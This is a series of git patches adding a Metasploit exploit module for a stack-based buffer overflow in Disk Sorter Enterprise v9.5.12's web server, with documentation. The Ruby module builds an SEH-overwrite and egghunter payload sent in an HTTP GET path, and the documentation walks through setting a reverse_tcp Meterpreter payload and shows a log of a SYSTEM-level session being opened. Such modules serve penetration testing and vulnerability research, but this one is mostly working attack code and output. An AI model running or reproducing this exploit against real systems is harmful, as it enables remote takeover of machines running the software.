From f1c51447c12e51c693e63317e4d572b661894c56 Mon Sep 17 00:00:00 2001
From: DanielRTeixeira <DanielRTeixeira@users.noreply.github.com>
Date: Wed, 19 Apr 2017 10:57:41 +0100
Subject: [PATCH 1/4] Add files via upload

Buffer Overflow on Disk Sorter Enterprise
---
 .../exploits/windows/http/disksorter_bof.rb   | 104 ++++++++++++++++++
 1 file changed, 104 insertions(+)
 create mode 100644 modules/exploits/windows/http/disksorter_bof.rb

diff --git a/modules/exploits/windows/http/disksorter_bof.rb b/modules/exploits/windows/http/disksorter_bof.rb
new file mode 100644
index 0000000000..3616e6dddf
--- /dev/null
+++ b/modules/exploits/windows/http/disksorter_bof.rb
@@ -0,0 +1,104 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::Seh
+  include Msf::Exploit::Remote::Egghunter
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Disk Sorter Enterprise GET Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a stack-based buffer overflow vulnerability
+        in the web interface of Disk Sorter Enterprise v9.5.12,caused by
+        improper bounds checking of the request path in HTTP GET requests
+        sent to the built-in web server. This module has been tested
+        successfully on Windows 7 SP1 x86.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Daniel Teixeira'
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00\x09\x0a\x0d\x20\x26",
+          'Space'      => 500
+        },
+      'Targets'        =>
+        [
+          [ 'Disk Sorter Enterprise v9.5.12',
+            {
+              'Offset' => 2488,
+              'Ret'    => 0x10051223  # POP # POP # RET [libspp.dll]
+            }
+          ]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Mar 15 2017',
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/'
+    )
+
+    if res && res.code == 200
+      version = res.body[/Disk Sorter Enterprise v[^<]*/]
+      if version
+        vprint_status("Version detected: #{version}")
+        if version =~ /9\.5\.12/
+          return Exploit::CheckCode::Appears
+        end
+        return Exploit::CheckCode::Detected
+      end
+    else
+      vprint_error('Unable to determine due to a HTTP connection timeout')
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+
+    eggoptions = {
+      checksum: true,
+      eggtag: rand_text_alpha(4, payload_badchars)
+    }
+
+    hunter, egg = generate_egghunter(
+      payload.encoded,
+      payload_badchars,
+      eggoptions
+    )
+
+    sploit =  rand_text_alpha(target['Offset'])
+    sploit << generate_seh_record(target.ret)
+    sploit << hunter
+    sploit << make_nops(10)
+    sploit << egg
+    sploit << rand_text_alpha(5500)
+
+    print_status('Sending request...')
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri'    => sploit
+    )
+  end
+end

From 47898717c992f5bfd7a45f8605840b7d7e05cb86 Mon Sep 17 00:00:00 2001
From: Daniel Teixeira <DanielRTeixeira@users.noreply.github.com>
Date: Mon, 24 Apr 2017 14:47:25 +0100
Subject: [PATCH 2/4] Minor documentation improvements

Space after ,
---
 modules/exploits/windows/http/disksorter_bof.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/http/disksorter_bof.rb b/modules/exploits/windows/http/disksorter_bof.rb
index 3616e6dddf..955b6adb6e 100644
--- a/modules/exploits/windows/http/disksorter_bof.rb
+++ b/modules/exploits/windows/http/disksorter_bof.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'           => 'Disk Sorter Enterprise GET Buffer Overflow',
       'Description'    => %q{
         This module exploits a stack-based buffer overflow vulnerability
-        in the web interface of Disk Sorter Enterprise v9.5.12,caused by
+        in the web interface of Disk Sorter Enterprise v9.5.12, caused by
         improper bounds checking of the request path in HTTP GET requests
         sent to the built-in web server. This module has been tested
         successfully on Windows 7 SP1 x86.

From c5b594d928a1173243dc723e7714385cc878e45c Mon Sep 17 00:00:00 2001
From: Daniel Teixeira <DanielRTeixeira@users.noreply.github.com>
Date: Mon, 24 Apr 2017 14:59:47 +0100
Subject: [PATCH 3/4] Disk Sorter Enterprise Documentation

---
 .../exploit/windows/http/disksorter_bof.rb.md | 73 +++++++++++++++++++
 1 file changed, 73 insertions(+)
 create mode 100644 documentation/modules/exploit/windows/http/disksorter_bof.rb.md

diff --git a/documentation/modules/exploit/windows/http/disksorter_bof.rb.md b/documentation/modules/exploit/windows/http/disksorter_bof.rb.md
new file mode 100644
index 0000000000..9414da27bb
--- /dev/null
+++ b/documentation/modules/exploit/windows/http/disksorter_bof.rb.md
@@ -0,0 +1,73 @@
+## Vulnerable Application
+
+[Disk Sorter Enterprise](http://www.disksorter.com) versions up to v9.5.12 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Exploit-DB](https://www.exploit-db.com/apps/5ffae2c1a4b2165e0dd2a8e37765ef0e-disksorterent_setup_v9.5.12.exe).
+
+## Verification Steps
+  1. Install a vulnerable Disk Sorter Enterprise
+  2. Start `Disk Sorter Enterprise` service
+  3. Start `Disk Sorter Enterprise` client application
+  4. Navigate to `Tools` > `Disk Sorter Options` > `Server`
+  5. Check `Enable Web Server On Port 80` to start the web interface
+  6. Start `msfconsole`
+  7. Do `use exploit/windows/http/disksorter_bof`
+  8. Do `set RHOST ip`
+  9. Do `check`
+  10. Verify the target is vulnerable
+  11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
+  12. Do `set LHOST ip`
+  13. Do `exploit`
+  14. Verify the Meterpreter session is opened
+
+## Scenarios
+
+###Disk Sorter Enterprise v9.5.12 on Windows 7 SP1
+
+```
+msf exploit(disksorter_bof) > show options 
+
+Module options (exploit/windows/http/disksorter_bof):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST    172.16.0.9       yes       The target address
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.16.0.20      yes       The listen address
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Disk Sorter Enterprise v9.5.15
+
+
+msf exploit(disksorter_bof) > exploit 
+
+[*] Started reverse TCP handler on 172.16.0.20:4444 
+[*] Sending request...
+[*] Sending stage (957487 bytes) to 172.16.0.9
+[*] Meterpreter session 1 opened (172.16.0.20:4444 -> 172.16.0.9:59371) at 2017-04-24 14:46:52 +0100
+
+meterpreter > getuid 
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo 
+Computer        : PC
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x86
+System Language : pt_PT
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter >
+```
\ No newline at end of file

From a404a1ed0455d309133754131a10a419ab686384 Mon Sep 17 00:00:00 2001
From: Daniel Teixeira <DanielRTeixeira@users.noreply.github.com>
Date: Mon, 24 Apr 2017 21:58:37 +0100
Subject: [PATCH 4/4] Rename disksorter_bof.rb.md to disksorter_bof.md

---
 .../windows/http/{disksorter_bof.rb.md => disksorter_bof.md}    | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename documentation/modules/exploit/windows/http/{disksorter_bof.rb.md => disksorter_bof.md} (99%)

diff --git a/documentation/modules/exploit/windows/http/disksorter_bof.rb.md b/documentation/modules/exploit/windows/http/disksorter_bof.md
similarity index 99%
rename from documentation/modules/exploit/windows/http/disksorter_bof.rb.md
rename to documentation/modules/exploit/windows/http/disksorter_bof.md
index 9414da27bb..6d76a09d4d 100644
--- a/documentation/modules/exploit/windows/http/disksorter_bof.rb.md
+++ b/documentation/modules/exploit/windows/http/disksorter_bof.md
@@ -70,4 +70,4 @@ Domain          : WORKGROUP
 Logged On Users : 1
 Meterpreter     : x86/windows
 meterpreter >
-```
\ No newline at end of file
+```